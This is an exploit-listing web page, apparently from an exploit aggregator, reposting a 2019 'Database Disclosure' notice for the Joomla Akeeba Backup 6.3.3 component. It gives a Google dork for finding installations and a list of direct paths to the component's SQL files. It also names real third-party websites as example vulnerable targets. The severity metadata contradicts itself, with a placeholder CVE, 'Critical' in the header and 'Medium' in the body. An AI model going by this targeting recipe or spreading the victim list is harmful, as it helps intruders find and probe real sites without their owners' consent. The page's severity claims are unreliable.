Advertisement






Joomla Akeeba Backup Components 6.3.3 Database Disclosure

CVE Category Price Severity
CVE-2021-xxx CWE-264 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2019-01-19
CPE
cpe:cpe:/a:joomla:akeeba_backup:6.3.3
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02654 0.65743

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010194

Below is a copy:

Joomla Akeeba Backup Components 6.3.3 Database Disclosure
###################################################################################

# Exploit Title : Joomla Akeeba Backup Components 6.3.3 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : akeebabackup.com
# Software Information Link : extensions.joomla.org/extension/akeeba-backup/
# Software Download Link : akeebabackup.com/download/akeeba-backup/6-3-3/pkg_akeeba-6-3-3-core-zip.zip
# Software Affected Version : 6.3.3
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_akeeba/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

###################################################################################

# Description :
**************

Akeeba Backup Core is the most widely used open-source backup component for the Joomla! CMS. 
Its mission is simple: create a site backup that can be restored on any Joomla!-capable server, 
making it ideal not only for backups but also for site transfers or even deploying sites to your 
clients' servers. Akeeba Backup creates a full backup of your site in a single archive. 
The archive contains all the files, a database snapshot and an installer similar in function
to the standard Joomla! installer. The backup and restore process is AJAX powered 
to avoid server timeouts, even with huge sites. Alternatively, you can make a backup of 
only your database, or only your files. Akeeba Backup is the reliable, easy to use, 
open source backup solution for your Joomla! site.

###################################################################################

# Database Disclosure Exploit :
***************************
/administrator/components/com_akeeba/sql/common/mysql.xml
/administrator/components/com_akeeba/sql/common/postgresql.xml
/administrator/components/com_akeeba/sql/common/sqlsrv.xml
/administrator/components/com_akeeba/sql/install/mysql/install.sql
/administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
/administrator/components/com_akeeba/sql/install/sqlazure/install.sql
/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
/administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
/administrator/components/com_akeeba/sql/updates/mysql/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/mysql/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/mysql/3.6.0-2012-07-31.sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.6.0-2012-07-31.sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.6.0-2012-07-31.sql

###################################################################################

# Example Vulnerable Sites :
*************************

[+] pentictonwebdesign.com/sites/stop/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql

[+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_akeeba/sql/install/mysql/uninstall.sql

[+] bainhotte.com/a%20sup/administrator/components/com_akeeba/sql/install/mysql/install.sql

[+] alsys.ma/administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql

[+] farwestpizza.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql

[+] leschaumieresdekerguan.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql

[+] desertlearningcenter.org/joomla/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql

[+] staszickutno.pl/staszickutno.pl/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql

[+] prehisto.ch/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql

###################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum